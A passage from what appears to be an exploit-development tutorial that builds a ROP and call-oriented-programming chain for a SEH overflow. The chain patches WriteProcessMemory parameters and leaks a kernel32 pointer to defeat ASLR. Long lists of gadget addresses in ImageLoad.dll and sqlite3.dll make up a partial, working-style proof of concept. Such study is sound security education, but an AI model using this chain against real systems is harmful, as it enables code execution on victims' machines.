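def run_eax_routine(chain, eax):
    """Replay the two gadgets and return (new EAX, next return target)."""
    stack = iter(chain)
    assert next(stack) == 0x1001fce9  # ret into the first gadget
    esi = next(stack)                 # pop esi
    next(stack)                       # add esp, 0x8 (first padding DWORD)
    next(stack)                       # add esp, 0x8 (second padding DWORD)
    assert next(stack) == 0x10022f45  # ret into the second gadget
    eax = (eax - esi) & MASK32        # sub eax, esi
    next(stack)                       # pop edi
    next(stack)                       # pop esi
    return eax, next(stack)           # ret

new_eax, next_target = run_eax_routine(chain, 0x02826000)
print(hex(new_eax), hex(next_target))
```

If a padding DWORD were missing, one of the two assertions would fire or the wrong DWORD would be returned as the next target, which mirrors the crash that would be seen in the debugger.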

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2bc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer) is going to be overwritten with the contents of EAX (which contains the stack address that points to our shellcode).

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction - we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!

nSize

nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal) - as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses - let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this - with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop the address of a ROP gadget into EDI, which would perform an add esp, X ; ret. Why add esp, X you may ask?

As you may, or may not, know - when a call instruction is executed - it pushes its return address onto the stack. This is done so the called function knows where to return after it is done executing. However, we can just execute an add esp, X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack - meaning a total of 0x8 bytes (2 DWORDs) will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret gadget into EDI.

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the address of the add esp, 0x8 ; ret gadget into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack - where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.
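As a quick check on the repeat count, the number of COP gadgets needed is just the target value divided by 0x20. The helper below is a hypothetical convenience, not part of the original PoC; it only reuses the gadget address shown in the chain above.

```python
import struct

ADD_EDX_0X20 = 0x1001b884  # add edx, 0x20 ; push edx ; call edi (address from the chain above)


def add_edx_chain(target, current=0):
    """Return the packed COP gadgets needed to raise EDX from `current` to `target`.

    Hypothetical helper: it only works when the difference is a non-negative
    multiple of 0x20, because that is all the gadget can add.
    """
    if target < current or (target - current) % 0x20:
        raise ValueError("difference must be a non-negative multiple of 0x20")
    count = (target - current) // 0x20
    return struct.pack('<L', ADD_EDX_0X20) * count


chain = add_edx_chain(0x180)
print(len(chain) // 4)  # number of gadgets in the chain
```

The PoC in this post spells the gadgets out one per line instead, which makes each one easy to follow in the debugger.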

Now that EDX contains our intended value of 0x180, we can use the same mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with our intended value of 0x180.

We will use the ECX register, which currently still contains the stack address of the now correct lpBuffer parameter - 0x8 (remember, ECX was used at an offset of 0x8 last time, meaning it is 0x8 bytes behind the lpBuffer parameter, which is itself 4 bytes behind the nSize parameter placeholder - for a total of 0xC, or 12 decimal, bytes).

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).
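The offsets in play can be laid out explicitly. The sketch below assumes the placeholder frame is ordered as in the PoC (function pointer, return address, then the five parameters) and uses offsets relative to the start of that frame rather than real stack addresses.

```python
# Order of the DWORD placeholders on the stack, lowest address first.
FRAME = [
    "WriteProcessMemory pointer",
    "return address",
    "hProcess",
    "lpBaseAddress",
    "lpBuffer",
    "nSize",
    "lpNumberOfBytesWritten",
]

# Offset of each placeholder from the start of the frame (4 bytes per entry).
OFFSET = {name: 4 * index for index, name in enumerate(FRAME)}

# ECX was left 0x8 bytes behind lpBuffer by the earlier [ecx+0x8] write.
ecx = OFFSET["lpBuffer"] - 0x8

print(hex(OFFSET["nSize"] - ecx))                                   # increments needed to reach nSize
print(hex(OFFSET["nSize"] - OFFSET["WriteProcessMemory pointer"]))  # distance back to the function pointer
```

The first value is the 0xC increments discussed here; the second is the distance ECX has to travel back once nSize has been written.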

Utilizing the same gadgets from a previous ROP routine - we can increase ECX by 0xC (12 decimal) bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

It should also be noted that each time one of these ROP gadgets executes, the AL register is increased by 0x39. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.
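To see why the side effect stays contained, here is a rough model of add al, 0x39 applied twelve times. The starting EAX value is invented for illustration; the point is that only the low byte changes and any carry out of AL is discarded rather than propagated into the rest of EAX.

```python
def add_al(eax, imm8):
    """Model `add al, imm8`: only the low byte of EAX changes, with wraparound."""
    al = (eax + imm8) & 0xFF          # the carry out of AL is not added to AH
    return (eax & 0xFFFFFF00) | al


eax = 0x0263F178  # hypothetical stack-ish value, for illustration only
for _ in range(12):
    eax = add_al(eax, 0x39)

print(hex(eax))
```

The upper 24 bits are untouched, so EAX stays within 0xFF bytes of where it started no matter how many times the gadget runs.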

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!

kernel32!WriteProcessMemory

Perfect! All that is left now is to extract our current pointer into kernel32.dll and calculate the offset between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive of dynamically manipulating a parameter placeholder to make the kernel32!WriteProcessMemory placeholder point to the actual API.

Currently, ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders) is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increased EDX to 0x180, we can reuse the EXACT same COP gadget to add another 0xE0 bytes (7 x 0x20), which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the address of the kernel32!WriteProcessMemory parameter placeholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine - we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory parameter placeholder and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

Currently, the stack address 0x2636920 (which changes when the process restarts) points to 0x61c832e4, which in turn points to an address in kernel32.dll. In other words, we have a pointer to a pointer to the address we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX - dynamically!
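The double dereference can be pictured with a toy memory map. The two addresses on the left come from the text above; the kernel32.dll address on the right is a made-up value, since the real one changes with ASLR.

```python
# Toy memory: address -> DWORD stored there.
memory = {
    0x02636920: 0x61c832e4,  # stack placeholder -> IAT entry (values from the text)
    0x61c832e4: 0x76D01234,  # IAT entry -> kernel32.dll address (hypothetical value)
}


def mov_eax_deref(eax):
    """Model `mov eax, dword [eax] ; ret`."""
    return memory[eax]


eax = 0x02636920
eax = mov_eax_deref(eax)   # first gadget: EAX now holds the IAT entry address
iat_entry = eax
eax = mov_eax_deref(eax)   # second gadget: EAX now holds the kernel32.dll address
print(hex(iat_entry), hex(eax))
```

Nothing here depends on knowing the kernel32.dll address in advance, which is what makes the leak work on every run.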

This is great news. We have defeated ASLR on the system itself. What needs to happen now is to find the offset between kernel32!WriteProcessMemory and kernel32!WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes - we use the negative distance).

However, if we subtract these two values - it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math - let’s just use a different function from the IAT. Preferably, let’s find a function whose virtual address is lower than that of kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired output!
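For reference, here is how the negative distance behaves under 32-bit arithmetic. This is a sketch only: the kernel32!GetStartupInfoA address is invented, and just the 0xfffffd2d constant comes from the text.

```python
MASK32 = 0xFFFFFFFF


def sub32(a, b):
    """Model a 32-bit `sub`: the result wraps around modulo 2**32."""
    return (a - b) & MASK32


def as_signed32(value):
    """Interpret a 32-bit value as a signed two's complement integer."""
    return value - (1 << 32) if value & 0x80000000 else value


NEG_DISTANCE = 0xfffffd2d          # constant from the text (no NULL bytes)
get_startup_info_a = 0x76D01000    # hypothetical kernel32!GetStartupInfoA address

write_process_memory = sub32(get_startup_info_a, NEG_DISTANCE)
print(as_signed32(NEG_DISTANCE), hex(write_process_memory))
```

Subtracting the negative value is the same as adding 0x2d3, so the result lands 0x2d3 bytes above the leaked pointer.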

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain


# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for the ROP gadget which moves EAX into ECX and ends in "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Negative distance (0xfffffd44 = -0x2bc) from EAX to the shellcode
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
